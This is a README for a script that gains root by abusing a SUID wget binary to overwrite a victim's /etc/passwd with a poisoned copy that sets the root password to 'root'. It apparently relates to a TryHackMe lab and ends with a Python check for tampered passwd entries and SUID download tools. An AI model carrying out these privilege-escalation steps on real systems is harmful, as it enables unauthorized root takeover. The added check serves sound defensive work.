If the wget binary has the SUID bit set, it does not drop its elevated privileges and can be abused to access the file system: it can perform privileged writes or write files outside a restricted file system. This script automates rewriting the passwd file on the victim's machine.
First, copy the victim's /etc/passwd file to your host machine with the following command:

    scp user@host:/etc/passwd .

(the /etc/passwd file)
After copying the victim's /etc/passwd file, it is time to run the exploit. Run it with sudo, since root privileges are needed to modify the victim's /etc/passwd file for permission reasons.
    usage: sudo wget_exploit.py [-h] [--file FILE] [--interface INTERFACE] [--port PORT] [--password PASSWORD]

    Poison the victims /etc/passwd file and host it over HTTP. Overwrite the /etc/passwd file of the victim by abusing the SUID bit of the wget binary.

    options:
      -h, --help            show this help message and exit
      --file FILE, -f FILE  passwd file to poison
      --interface INTERFACE, -i INTERFACE
                            network interface or IP address to host the HTTP server (default: eth0)
      --port PORT, -p PORT  port to serve the HTTP server (default: 8000)
      --password PASSWORD, -P PASSWORD
                            password to set for the root user (default: root)
The script poisons the <passwd copy> file by adding the new root password. It then hosts the <passwd copy> file over HTTP using a custom reusable Python HTTP server. Dynamic instructions are also printed at the command line while the exploit runs, as shown in the picture below.
The password for the root user is simply root.
TryHackMe has an awesome machine that lets you play with this exploit.
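A defensive check for the two conditions this technique depends on, added here as an example that is not part of the script or the original README: it parses a constructed passwd sample for a root entry carrying an inline hash (a sign the file was replaced rather than managed through /etc/shadow) or extra UID 0 accounts, and reports whether wget, or more generally curl, is installed SUID. The binary paths and the sample passwd content are assumptions.

```python
import os
import stat

# Constructed sample (not from a real host): the root entry carries an inline
# hash instead of the usual "x" (real hashes belong in /etc/shadow), and a
# second UID 0 account is present. Both are signs of a tampered passwd file.
SAMPLE_PASSWD = """root:$6$constructedsalt$constructedhashvalue:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backdoor:x:0:0::/root:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""


def suspicious_passwd_entries(text):
    """Return (username, reason) pairs for passwd entries a defender should review."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field, passwordless login"))
        elif pw not in ("x", "*", "!"):
            findings.append((user, "password hash stored in passwd, bypasses shadow"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


def is_suid(path):
    """True if the file at path exists and has the set-user-ID bit set."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & stat.S_ISUID)


def audit_download_tools(paths=("/usr/bin/wget", "/usr/bin/curl")):
    """Return the download tools installed SUID; on a healthy host this is empty."""
    return [p for p in paths if is_suid(p)]
```

Run audit_download_tools() on a host to confirm the list is empty, and feed the real /etc/passwd to suspicious_passwd_entries() as part of an integrity check.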